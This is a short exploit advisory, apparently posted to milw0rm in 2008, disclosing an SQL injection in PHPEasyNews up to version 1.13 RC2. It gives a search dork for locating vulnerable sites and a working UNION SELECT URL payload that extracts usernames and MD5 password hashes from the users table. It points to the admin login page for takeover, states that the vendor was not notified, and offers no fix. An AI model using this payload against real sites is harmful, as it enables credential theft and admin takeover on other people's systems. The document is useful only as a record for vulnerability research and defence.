-[*]+================================================================================+[*]- -[*]+ PHPEasyNews <= 1.13 RC2 SQL Injection Vulnerabilitys +[*]- -[*]+================================================================================+[*]- [*] Discovered By: t0pP8uZz [*] Discovered On: 4 JUNE 2008 [*] Script Download: http://brettjenkins.co.uk [*] DORK: "PHPeasynews" (no stable dork, diff versions use diff text) [*] Vendor Has Not Been Notified! [*] DESCRIPTION: PHPEasyNews suffers from a insecure mysql query, this allows the remote attacker to arbitrary pull information from the database. thus allowing to login has admin, and possibly gaining a shell. the injection returns multi data, so it will show all users, the first is normally the admin. [*] SQL Injection: http://site.com/newsarchive.php?post=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6/**/FROM/**/pen_users/* [*] NOTE/TIP: admin login is at "admin.php" all passwords are encrypted in MD5. [*] GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! [-] peace, t0pP8uZz -[*]+================================================================================+[*]- -[*]+ PHPEasyNews <= 1.13 RC2 SQL Injection Vulnerabilitys +[*]- -[*]+================================================================================+[*]-